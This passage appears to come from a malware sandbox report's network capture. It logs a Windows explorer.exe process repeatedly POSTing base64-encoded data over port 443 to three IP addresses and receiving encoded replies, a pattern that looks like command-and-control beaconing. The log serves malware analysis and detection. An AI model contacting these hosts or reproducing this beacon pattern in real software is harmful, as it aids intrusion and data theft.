2024-07-27 05:46:24 UTC	685	IN	Data Raw: 4c 52 39 42 2b 35 36 59 61 76 35 50 67 74 33 43 79 4f 38 41 66 69 68 75 43 54 6d 6a 66 70 37 2b 53 53 4a 70 49 39 65 2f 6d 52 36 37 7a 31 4f 68 2b 66 7a 45 79 71 2b 32 77 4c 50 34 5a 2f 38 6f 44 4f 42 76 76 34 58 61 68 39 69 53 61 4c 47 59 4f 6e 6e 2b 37 4a 4c 37 36 36 71 61 62 6f 63 5a 31 58 74 48 61 58 6e 62 38 47 34 76 72 52 48 44 74 6d 75 78 33 58 62 6b 59 7a 76 53 46 72 36 2b 78 61 37 74 55 54 78 64 71 2f 48 2f 4d 63 41 53 64 4e 71 48 62 62 70 55 59 62 72 63 43 34 4a 32 38 41 74 6f 71 44 55 46 59 34 58 35 39 68 2b 6b 57 42 52 66 63 6b 78 52 35 78 46 36 73 4e 39 30 49 38 78 70 65 61 2b 6c 6c 55 79 70 5a 6e 55 59 35 32 4b 52 2f 51 6c 6d 56 47 76 4d 46 73 4c 69 71 50 6c 68 4f 58 2b 44 55 6f 67 43 56 68 70 4b 6e 55 2b 43 59 34 34 76 66 4d 4f 2f 50 49 30 Data Ascii: LR9B+56Yav5Pgt3CyO8AfihuCTmjfp7+SSJpI9e/mR67z1Oh+fzEyq+2wLP4Z/8oDOBvv4Xah9iSaLGYOnn+7JL766qabocZ1XtHaXnb8G4vrRHDtmux3XbkYzvSFr6+xa7tUTxdq/H/McASdNqHbbpUYbrcC4J28AtoqDUFY4X59h+kWBRfckxR5xF6sN90I8xpea+llUypZnUY52KR/QlmVGvMFsLiqPlhOX+DUogCVhpKnU+CY44vfMO/PI0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	62380	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:24 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:24 UTC	1267	OUT	Data Raw: 50 66 74 39 69 78 31 62 64 78 34 2b 4f 50 39 52 42 59 36 6b 54 75 41 69 56 6a 4d 59 58 58 68 6e 6c 66 33 68 68 43 73 55 6f 6b 54 55 73 76 51 63 4f 42 2b 4a 33 59 48 62 69 4b 78 35 43 52 5a 45 70 77 30 33 54 4d 54 61 6f 72 72 4f 75 2f 49 63 69 52 71 2f 4f 6e 31 4e 2f 36 68 4a 44 73 6f 47 57 7a 6b 63 59 6f 71 68 70 61 77 66 65 6c 47 4c 37 7a 73 54 39 4b 55 46 4e 6f 50 6d 38 65 34 76 4d 71 36 32 64 6f 39 4e 49 6c 34 41 43 4a 59 2f 74 59 57 55 6c 72 4e 6a 49 32 64 30 33 34 6d 64 71 35 76 4d 70 59 78 66 66 4b 6a 48 71 36 56 6f 58 36 65 79 69 2f 4c 57 71 4a 44 6c 73 65 6d 39 58 67 53 4c 34 4e 53 70 32 55 71 6d 54 68 4d 45 79 70 47 6e 53 4c 4d 47 75 73 35 36 71 37 43 44 58 47 5a 75 47 58 46 49 62 49 54 65 63 6e 4d 55 37 54 72 4d 59 55 7a 36 74 5a 4c 6a 46 77 39 Data Ascii: Pft9ix1bdx4+OP9RBY6kTuAiVjMYXXhnlf3hhCsUokTUsvQcOB+J3YHbiKx5CRZEpw03TMTaorrOu/IciRq/On1N/6hJDsoGWzkcYoqhpawfelGL7zsT9KUFNoPm8e4vMq62do9NIl4ACJY/tYWUlrNjI2d034mdq5vMpYxffKjHq6VoX6eyi/LWqJDlsem9XgSL4NSp2UqmThMEypGnSLMGus56q7CDXGZuGXFIbITecnMU7TrMYUz6tZLjFw9
2024-07-27 05:46:26 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:26 UTC	685	IN	Data Raw: 79 53 59 42 48 35 7a 6c 38 6a 61 59 59 49 50 62 31 62 45 59 43 78 6f 76 4a 71 2f 55 36 6c 6b 53 76 31 7a 38 46 49 37 4d 79 72 77 6c 67 67 66 78 52 76 46 5a 48 75 6b 7a 6b 4c 43 2b 56 62 6d 74 39 36 55 4b 65 79 50 74 67 71 44 78 44 71 44 72 6e 57 78 73 48 35 57 55 70 47 56 34 37 79 57 53 4d 68 4b 4f 68 52 71 30 6f 6f 41 75 2f 57 59 64 6a 53 59 55 75 6b 72 62 49 61 62 42 34 67 38 70 6a 45 43 6a 72 75 66 64 57 62 45 59 52 72 78 70 5a 32 4d 41 6a 48 4c 53 71 4c 41 52 65 79 4f 46 62 44 30 43 37 39 4a 78 44 4b 6e 74 77 63 4d 42 43 49 59 69 63 69 7a 32 46 30 47 58 32 73 31 4f 69 6c 6f 57 67 79 39 4a 76 64 72 34 62 35 77 45 52 47 65 45 76 6e 79 4b 64 50 57 74 56 76 46 6c 57 6b 57 51 74 48 64 34 46 6e 7a 35 4c 6a 72 31 6d 54 32 6a 73 36 6f 31 31 73 34 48 50 35 6a Data Ascii: ySYBH5zl8jaYYIPb1bEYCxovJq/U6lkSv1z8FI7MyrwlggfxRvFZHukzkLC+Vbmt96UKeyPtgqDxDqDrnWxsH5WUpGV47yWSMhKOhRq0ooAu/WYdjSYUukrbIabB4g8pjECjrufdWbEYRrxpZ2MAjHLSqLAReyOFbD0C79JxDKntwcMBCIYiciz2F0GX2s1OiloWgy9Jvdr4b5wERGeEvnyKdPWtVvFlWkWQtHd4Fnz5Ljr1mT2js6o11s4HP5j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	62381	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:26 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:26 UTC	1122	OUT	Data Raw: 53 38 61 57 56 34 54 49 64 41 74 4d 47 33 50 4b 70 38 78 34 34 5a 4b 68 72 75 32 34 59 4d 51 4c 35 64 37 5a 6b 73 42 34 32 7a 59 6c 69 73 6a 2b 45 34 6d 43 72 38 68 51 53 41 6a 47 4e 6e 30 2b 35 68 62 76 76 32 79 69 4c 38 75 53 37 77 56 65 4d 59 48 70 69 63 4e 6e 75 4f 72 58 6c 59 78 39 39 4f 4c 45 4b 4d 76 56 37 65 33 6b 30 74 6f 6f 73 6c 49 42 63 70 49 2b 75 5a 63 2b 67 50 35 42 38 44 30 67 6e 50 46 62 50 55 78 71 51 59 75 31 43 5a 32 4d 39 47 48 39 44 65 70 57 75 63 58 75 39 43 4c 35 77 48 6f 79 67 47 30 53 56 47 39 38 33 52 66 70 39 43 36 32 67 71 45 47 63 6d 45 50 58 66 58 71 63 54 71 50 4d 42 6d 6f 78 47 5a 39 4f 66 59 62 57 66 33 30 30 4c 56 76 63 6a 46 35 35 76 4e 46 30 51 54 53 47 59 66 5a 70 7a 70 68 2b 31 35 56 4b 2b 6a 37 71 61 2b 4c 79 39 5a Data Ascii: S8aWV4TIdAtMG3PKp8x44ZKhru24YMQL5d7ZksB42zYlisj+E4mCr8hQSAjGNn0+5hbvv2yiL8uS7wVeMYHpicNnuOrXlYx99OLEKMvV7e3k0tooslIBcpI+uZc+gP5B8D0gnPFbPUxqQYu1CZ2M9GH9DepWucXu9CL5wHoygG0SVG983Rfp9C62gqEGcmEPXfXqcTqPMBmoxGZ9OfYbWf300LVvcjF55vNF0QTSGYfZpzph+15VK+j7qa+Ly9Z
2024-07-27 05:46:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:28 UTC	685	IN	Data Raw: 65 64 4a 49 73 56 7a 4f 6e 4d 5a 69 79 52 65 68 32 4b 2b 4a 79 39 54 61 76 58 66 65 77 7a 2b 59 4e 7a 68 44 69 31 4f 49 61 36 69 47 2b 64 35 2b 31 33 6c 41 32 72 74 35 2f 4f 57 34 4d 38 54 49 33 47 4b 59 62 70 63 64 50 53 74 73 73 79 69 69 68 6f 39 5a 6b 50 4c 58 61 59 5a 6e 68 6e 2b 41 2b 38 55 47 59 48 6c 65 63 43 78 73 78 47 4f 67 45 78 58 56 58 63 61 45 4e 33 75 7a 51 4e 38 52 6a 6a 37 7a 74 57 33 39 64 56 6f 63 4c 59 63 66 78 4f 72 75 6f 32 61 5a 70 54 52 48 4b 5a 59 76 39 44 6c 61 54 32 56 52 64 6f 35 4a 42 61 56 37 53 79 43 7a 59 52 64 42 71 4c 73 77 66 70 64 62 4a 53 49 54 6e 48 6f 6d 48 57 38 38 2f 67 65 5a 58 57 46 38 30 48 43 6d 76 39 71 76 72 4f 48 32 32 6a 4f 64 6f 34 4f 67 72 68 75 44 46 58 71 58 65 6b 5a 36 57 33 62 6f 79 42 2b 42 59 63 56 Data Ascii: edJIsVzOnMZiyReh2K+Jy9TavXfewz+YNzhDi1OIa6iG+d5+13lA2rt5/OW4M8TI3GKYbpcdPStssyiiho9ZkPLXaYZnhn+A+8UGYHlecCxsxGOgExXVXcaEN3uzQN8Rjj7ztW39dVocLYcfxOruo2aZpTRHKZYv9DlaT2VRdo5JBaV7SyCzYRdBqLswfpdbJSITnHomHW88/geZXWF80HCmv9qvrOH22jOdo4OgrhuDFXqXekZ6W3boyB+BYcV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	62382	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:29 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:29 UTC	1122	OUT	Data Raw: 6a 69 56 47 69 52 77 6e 74 41 33 54 34 4f 63 4e 68 35 46 44 78 76 35 32 32 2f 71 6b 39 58 4b 62 6e 68 45 71 75 2f 49 4e 74 62 2b 6f 6b 68 4c 7a 2b 45 47 52 6f 54 41 59 64 38 39 6c 75 53 53 45 7a 49 6b 6a 70 79 36 69 62 4a 4d 63 4f 4a 6a 43 48 48 5a 4c 31 43 56 73 32 49 42 37 2f 65 52 48 56 44 36 79 44 66 2f 4f 5a 58 43 35 35 4e 72 68 35 2f 77 5a 33 68 35 36 2b 76 37 66 68 67 6b 73 2b 4d 45 54 79 44 52 6c 45 71 48 59 54 56 44 55 6a 5a 74 74 66 66 5a 54 30 52 6a 35 47 47 68 57 61 55 5a 58 31 79 4f 37 42 54 6d 78 58 7a 4c 6a 4d 43 31 70 45 4b 30 59 6c 67 6e 36 41 4d 72 67 36 2f 6f 6a 4c 64 6e 65 69 50 35 63 62 6b 44 62 47 76 71 2b 46 4e 57 2f 55 44 6d 7a 39 64 58 39 62 78 6f 66 2b 58 45 4e 68 2f 4a 72 30 34 35 51 67 6f 33 52 58 57 38 63 68 6f 71 6f 51 5a 48 Data Ascii: jiVGiRwntA3T4OcNh5FDxv522/qk9XKbnhEqu/INtb+okhLz+EGRoTAYd89luSSEzIkjpy6ibJMcOJjCHHZL1CVs2IB7/eRHVD6yDf/OZXC55Nrh5/wZ3h56+v7fhgks+METyDRlEqHYTVDUjZttffZT0Rj5GGhWaUZX1yO7BTmxXzLjMC1pEK0Ylgn6AMrg6/ojLdneiP5cbkDbGvq+FNW/UDmz9dX9bxof+XENh/Jr045Qgo3RXW8choqoQZH
2024-07-27 05:46:30 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:30 UTC	685	IN	Data Raw: 42 55 30 51 74 57 52 33 6e 74 65 41 78 48 50 6e 39 4a 6a 44 37 59 4f 6c 38 4b 34 47 6f 75 62 6e 2b 74 49 66 65 47 77 32 45 36 51 7a 6b 30 72 47 2b 50 31 69 52 43 59 4c 56 57 68 2f 4b 4f 68 56 69 55 43 43 67 45 6a 65 72 42 48 68 41 66 70 78 52 6d 31 6e 6a 74 74 48 2b 61 58 59 4e 41 2b 31 74 33 67 73 4e 32 65 46 36 34 52 61 70 78 76 71 57 6c 6d 5a 67 67 4a 41 70 55 41 39 6d 74 47 68 41 44 75 58 6e 4c 6d 53 41 4b 35 53 4e 67 73 66 6d 4c 77 2f 57 6f 71 4c 7a 53 41 2b 67 43 52 74 33 46 53 72 72 77 34 62 54 7a 43 4e 59 6e 79 31 2b 54 4f 6f 6a 4a 67 51 46 73 72 50 39 42 57 50 63 78 74 38 71 7a 72 51 56 73 63 31 42 4c 48 62 31 33 45 75 44 61 41 6e 77 69 39 6c 6f 64 73 62 75 6b 51 33 4b 2b 46 4b 41 45 2f 2b 62 69 76 4e 74 6c 69 73 61 56 35 54 6a 62 56 5a 42 44 5a Data Ascii: BU0QtWR3nteAxHPn9JjD7YOl8K4Goubn+tIfeGw2E6Qzk0rG+P1iRCYLVWh/KOhViUCCgEjerBHhAfpxRm1njttH+aXYNA+1t3gsN2eF64RapxvqWlmZggJApUA9mtGhADuXnLmSAK5SNgsfmLw/WoqLzSA+gCRt3FSrrw4bTzCNYny1+TOojJgQFsrP9BWPcxt8qzrQVsc1BLHb13EuDaAnwi9lodsbukQ3K+FKAE/+bivNtlisaV5TjbVZBDZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	62383	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:31 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:31 UTC	1122	OUT	Data Raw: 4b 6b 65 2f 6d 64 76 71 7a 64 44 58 70 50 77 53 57 34 53 74 54 47 6f 4e 37 6d 36 62 71 6e 79 71 45 67 64 4c 76 45 50 65 47 48 35 34 58 78 4c 41 67 57 2f 42 71 6c 44 46 74 6b 59 56 56 47 44 38 64 41 6c 75 59 6b 71 78 6f 72 6e 2f 2f 71 49 56 55 6b 6b 77 4d 55 7a 53 4e 35 51 63 54 74 56 50 38 57 36 5a 31 79 6e 38 5a 53 48 2b 30 6a 72 4b 4c 59 51 6d 31 42 38 57 50 66 64 46 54 2f 34 48 38 41 54 65 42 56 67 70 6e 4a 44 75 4e 76 74 70 67 66 6a 2b 4e 31 69 65 65 46 39 37 6b 62 6e 48 59 63 64 49 45 35 5a 51 61 56 52 72 65 65 51 62 75 74 74 30 48 79 46 6b 55 31 71 68 49 2b 50 62 77 77 58 79 45 2f 79 52 5a 75 46 37 5a 73 4d 70 37 36 37 4b 32 2f 46 54 49 48 56 64 59 37 51 54 4f 54 55 77 4e 37 65 4b 75 4a 6e 51 57 35 66 39 50 70 33 6c 2b 70 68 76 54 6b 4a 54 73 2b 42 Data Ascii: Kke/mdvqzdDXpPwSW4StTGoN7m6bqnyqEgdLvEPeGH54XxLAgW/BqlDFtkYVVGD8dAluYkqxorn//qIVUkkwMUzSN5QcTtVP8W6Z1yn8ZSH+0jrKLYQm1B8WPfdFT/4H8ATeBVgpnJDuNvtpgfj+N1ieeF97kbnHYcdIE5ZQaVRreeQbutt0HyFkU1qhI+PbwwXyE/yRZuF7ZsMp767K2/FTIHVdY7QTOTUwN7eKuJnQW5f9Pp3l+phvTkJTs+B
2024-07-27 05:46:32 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:32 UTC	685	IN	Data Raw: 6c 66 4a 4c 65 51 42 76 43 76 50 55 79 59 75 69 43 73 4d 78 79 32 48 38 68 34 4f 44 70 7a 30 44 42 4f 76 65 6c 52 4a 73 62 48 74 6c 68 4b 71 45 36 37 53 61 79 50 30 4d 32 61 5a 44 46 69 78 33 34 37 32 70 71 70 72 75 58 67 65 4e 74 74 49 47 71 69 44 75 70 31 77 53 6a 51 41 55 41 66 70 61 6b 41 75 32 79 76 53 2b 57 32 46 52 53 31 58 2f 70 35 5a 71 53 2f 65 73 59 43 70 68 50 30 76 74 64 74 4c 32 32 4b 38 4f 71 5a 44 31 37 79 67 55 49 63 75 34 33 69 4b 36 54 77 47 67 7a 6d 77 76 56 5a 4e 73 6e 58 66 57 55 5a 74 78 5a 39 38 51 42 45 63 31 56 58 53 45 36 39 4e 53 6a 44 44 77 4f 47 41 4b 6a 6f 6c 78 4b 4e 52 39 2f 67 48 6e 38 32 62 63 32 30 30 67 43 69 47 56 73 59 42 46 67 47 57 47 4b 59 62 41 53 66 43 32 6d 76 76 45 4d 62 6f 41 55 77 78 54 71 5a 55 4c 41 4b 78 Data Ascii: lfJLeQBvCvPUyYuiCsMxy2H8h4ODpz0DBOvelRJsbHtlhKqE67SayP0M2aZDFix3472pqpruXgeNttIGqiDup1wSjQAUAfpakAu2yvS+W2FRS1X/p5ZqS/esYCphP0vtdtL22K8OqZD17ygUIcu43iK6TwGgzmwvVZNsnXfWUZtxZ98QBEc1VXSE69NSjDDwOGAKjolxKNR9/gHn82bc200gCiGVsYBFgGWGKYbASfC2mvvEMboAUwxTqZULAKx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	62384	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:33 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:33 UTC	1122	OUT	Data Raw: 58 66 4b 31 61 48 4a 49 4a 34 62 68 54 72 39 54 37 75 43 72 2f 62 4e 2f 79 6f 62 48 30 38 47 4a 43 31 35 76 74 59 51 67 2f 38 55 52 33 35 66 33 46 74 49 74 61 4d 73 55 50 43 4e 51 6b 72 73 65 49 42 4f 2f 4d 4d 56 54 76 4b 73 58 68 79 65 78 73 44 44 53 71 63 79 56 52 59 69 4f 7a 66 4f 75 76 53 49 6e 6e 6b 41 78 63 6b 4e 33 7a 5a 61 41 7a 35 36 2f 48 57 4f 33 39 6a 39 70 6e 46 78 78 76 52 2f 61 6c 6b 31 71 4d 79 43 51 67 30 7a 2b 64 75 2f 46 39 35 75 76 78 6f 68 33 6d 6d 33 6c 61 62 33 44 79 72 6d 43 79 37 66 50 33 39 49 35 68 78 52 47 33 51 53 6f 4c 47 35 44 38 59 45 4f 55 35 53 57 59 4f 6d 58 49 7a 79 50 75 66 44 74 61 4a 6c 65 72 6d 75 42 57 59 56 73 52 32 30 67 36 4b 4b 70 63 48 4c 4c 71 34 4d 52 4e 64 53 46 34 54 34 4c 4e 4a 70 67 64 4c 38 71 35 75 2f Data Ascii: XfK1aHJIJ4bhTr9T7uCr/bN/yobH08GJC15vtYQg/8UR35f3FtItaMsUPCNQkrseIBO/MMVTvKsXhyexsDDSqcyVRYiOzfOuvSInnkAxckN3zZaAz56/HWO39j9pnFxxvR/alk1qMyCQg0z+du/F95uvxoh3mm3lab3DyrmCy7fP39I5hxRG3QSoLG5D8YEOU5SWYOmXIzyPufDtaJlermuBWYVsR20g6KKpcHLLq4MRNdSF4T4LNJpgdL8q5u/
2024-07-27 05:46:34 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:34 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:34 UTC	685	IN	Data Raw: 69 59 39 2b 6c 2f 54 32 75 55 4b 5a 48 30 48 6e 4e 35 46 71 52 58 65 47 38 66 51 52 4e 63 71 45 2b 63 37 30 68 66 54 38 68 73 63 6e 72 52 53 59 42 74 31 72 58 46 38 7a 31 6c 47 32 64 41 48 76 58 72 44 51 58 49 74 50 33 63 34 4e 70 47 78 4e 51 44 52 6e 74 62 2f 35 49 48 76 7a 6e 46 56 58 32 68 4c 64 77 4f 37 34 73 4c 47 72 7a 4a 33 2b 6d 4e 4f 56 75 6b 30 53 36 49 5a 54 73 38 35 45 58 70 34 77 37 4a 4a 33 46 74 66 39 38 45 52 48 42 31 72 6b 70 72 71 68 6c 34 66 4b 76 5a 78 74 53 52 42 49 6d 57 56 36 2b 42 33 62 77 31 68 33 73 77 4b 64 79 6d 32 4e 64 52 4d 6a 54 62 44 6e 49 47 41 6a 4d 36 49 43 4d 6b 61 55 44 45 30 70 75 69 4c 57 76 57 4f 47 73 41 45 6d 57 77 6a 56 30 51 32 52 4f 6b 55 64 75 6b 4c 79 57 6d 56 33 76 62 33 72 43 72 69 42 39 4d 69 67 42 70 30 Data Ascii: iY9+l/T2uUKZH0HnN5FqRXeG8fQRNcqE+c70hfT8hscnrRSYBt1rXF8z1lG2dAHvXrDQXItP3c4NpGxNQDRntb/5IHvznFVX2hLdwO74sLGrzJ3+mNOVuk0S6IZTs85EXp4w7JJ3Ftf98ERHB1rkprqhl4fKvZxtSRBImWV6+B3bw1h3swKdym2NdRMjTbDnIGAjM6ICMkaUDE0puiLWvWOGsAEmWwjV0Q2ROkUdukLyWmV3vb3rCriB9MigBp0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	62386	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:35 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:35 UTC	1267	OUT	Data Raw: 46 72 62 4e 44 41 2f 36 55 59 6d 4f 37 54 4e 52 2b 37 34 70 55 67 37 35 65 51 79 42 39 54 42 43 56 6a 45 53 51 55 67 42 50 54 64 6a 45 44 45 46 38 64 38 78 58 6f 72 32 77 77 47 6c 54 7a 6c 50 4d 44 77 57 66 45 46 66 64 50 51 73 6e 56 30 6a 61 57 30 5a 49 35 6e 54 62 77 43 6c 43 63 75 4a 78 65 4e 30 73 6d 6d 34 42 34 64 34 6f 35 6b 66 77 4e 6b 2f 70 57 32 4e 63 79 46 4f 77 4f 6c 4b 45 59 36 46 4d 6f 36 42 50 30 70 51 6f 76 64 33 2b 52 4e 6a 76 41 6a 70 6a 2b 57 48 4b 59 6b 41 51 77 6f 79 53 4e 73 2b 35 35 47 74 62 41 69 71 34 48 43 79 78 53 34 48 31 4b 31 49 36 45 4d 4e 50 59 4d 61 51 66 45 6b 7a 66 7a 68 64 77 4d 6b 36 32 79 4c 5a 4b 58 54 45 45 66 44 5a 42 53 50 62 30 49 61 6e 70 48 6b 35 53 52 4d 35 4c 59 36 61 49 41 73 50 56 57 4b 70 48 6c 44 53 75 34 Data Ascii: FrbNDA/6UYmO7TNR+74pUg75eQyB9TBCVjESQUgBPTdjEDEF8d8xXor2wwGlTzlPMDwWfEFfdPQsnV0jaW0ZI5nTbwClCcuJxeN0smm4B4d4o5kfwNk/pW2NcyFOwOlKEY6FMo6BP0pQovd3+RNjvAjpj+WHKYkAQwoySNs+55GtbAiq4HCyxS4H1K1I6EMNPYMaQfEkzfzhdwMk62yLZKXTEEfDZBSPb0IanpHk5SRM5LY6aIAsPVWKpHlDSu4
2024-07-27 05:46:36 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:36 UTC	685	IN	Data Raw: 4f 79 68 30 41 62 4b 34 6b 69 4e 33 42 5a 6d 4d 4e 45 6b 61 35 6c 4c 69 6e 6a 65 73 71 6e 75 6f 7a 4f 66 38 79 6e 53 76 51 46 4b 36 36 45 37 48 48 53 70 6c 73 64 50 55 38 55 63 70 32 76 53 56 6f 37 64 4a 4b 64 78 39 35 32 6d 61 34 66 4c 6d 34 72 4a 41 39 2f 42 7a 34 2b 67 63 53 4d 5a 76 37 35 68 30 57 50 5a 4b 62 7a 37 6f 74 7a 2f 76 4c 48 71 72 36 79 66 53 6a 58 4f 5a 79 37 71 42 2f 37 73 44 6b 73 77 34 32 53 46 64 68 69 46 37 73 55 4d 64 42 57 37 41 70 57 74 77 4e 30 75 50 78 36 6e 35 61 76 75 35 4e 4c 64 6c 6a 61 61 30 6f 51 4b 56 55 5a 59 77 4d 56 61 6c 37 70 67 42 53 66 4d 76 37 2b 56 30 34 5a 4d 32 62 6c 57 78 6c 62 41 36 72 62 6c 5a 4a 6f 62 2f 2b 2b 35 57 39 30 55 31 64 57 4a 36 67 35 46 31 73 44 74 48 4b 54 4f 6d 35 75 71 42 62 62 45 57 74 74 74 Data Ascii: Oyh0AbK4kiN3BZmMNEka5lLinjesqnuozOf8ynSvQFK66E7HHSplsdPU8Ucp2vSVo7dJKdx952ma4fLm4rJA9/Bz4+gcSMZv75h0WPZKbz7otz/vLHqr6yfSjXOZy7qB/7sDksw42SFdhiF7sUMdBW7ApWtwN0uPx6n5avu5NLdljaa0oQKVUZYwMVal7pgBSfMv7+V04ZM2blWxlbA6rblZJob/++5W90U1dWJ6g5F1sDtHKTOm5uqBbbEWttt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	62387	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:36 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:36 UTC	1122	OUT	Data Raw: 49 30 31 42 53 78 43 6a 55 42 7a 2f 54 6c 71 5a 37 2b 4e 41 4e 58 69 47 49 58 65 32 6f 36 42 6c 71 38 62 49 4a 6c 2f 30 56 49 6e 53 63 6c 38 38 4e 35 43 33 64 6d 6e 65 55 31 4e 46 75 54 71 51 57 75 75 39 64 47 77 48 52 51 7a 64 4e 4b 6d 31 48 38 76 56 74 53 6b 46 4b 71 56 32 38 4a 77 50 57 41 45 68 51 5a 70 45 37 53 6d 49 2f 70 69 77 69 72 6b 2b 38 66 42 6a 75 49 55 6e 77 7a 70 45 30 6c 57 4f 74 4b 32 5a 77 70 54 54 2b 68 55 68 61 66 37 41 44 6d 36 73 73 42 58 42 73 51 67 54 65 66 66 47 76 32 78 44 53 4f 6d 31 7a 79 65 35 6b 55 37 72 68 51 41 38 63 68 4e 74 79 52 41 49 66 36 68 78 2b 6c 6e 47 5a 49 70 74 36 59 66 63 67 59 75 32 67 51 2f 45 36 4e 2b 6e 52 69 5a 53 4c 6a 33 45 63 77 53 6e 73 65 42 34 69 32 49 62 57 5a 69 67 47 37 6a 62 67 78 6f 34 44 61 6f Data Ascii: I01BSxCjUBz/TlqZ7+NANXiGIXe2o6Blq8bIJl/0VInScl88N5C3dmneU1NFuTqQWuu9dGwHRQzdNKm1H8vVtSkFKqV28JwPWAEhQZpE7SmI/piwirk+8fBjuIUnwzpE0lWOtK2ZwpTT+hUhaf7ADm6ssBXBsQgTeffGv2xDSOm1zye5kU7rhQA8chNtyRAIf6hx+lnGZIpt6YfcgYu2gQ/E6N+nRiZSLj3EcwSnseB4i2IbWZigG7jbgxo4Dao
2024-07-27 05:46:38 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:38 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:38 UTC	685	IN	Data Raw: 41 4e 49 48 62 45 35 33 31 58 73 2f 6d 69 67 76 45 5a 2b 6d 6e 53 42 65 4a 69 36 6e 54 58 66 47 32 59 35 31 45 38 4f 4a 66 41 4b 52 6b 46 38 45 6f 59 4f 55 79 2f 4f 79 4f 33 42 38 64 74 48 38 63 55 79 41 7a 50 30 55 41 30 59 50 75 37 64 2b 42 68 4b 59 36 65 6c 77 67 45 58 39 6a 4b 50 30 32 46 54 68 4c 6e 64 76 6f 79 75 49 42 71 33 33 73 6d 35 42 77 77 73 7a 64 4f 43 61 67 52 4e 37 34 36 6d 36 6c 61 76 6e 65 38 6b 47 61 66 72 7a 52 54 56 59 32 36 68 33 68 77 57 44 69 5a 4a 72 63 69 69 52 48 4a 55 68 38 6b 70 74 52 78 67 6d 68 4f 77 69 51 54 41 2b 42 4b 63 61 4f 66 6e 59 39 55 33 32 6f 6e 72 43 56 78 36 6f 78 56 53 4a 30 2f 57 34 6e 36 76 64 63 49 55 74 63 7a 39 62 32 43 50 6d 30 42 61 6d 72 72 35 31 53 6e 4a 4f 31 4a 44 42 79 33 43 4a 38 36 61 31 47 5a 4a Data Ascii: 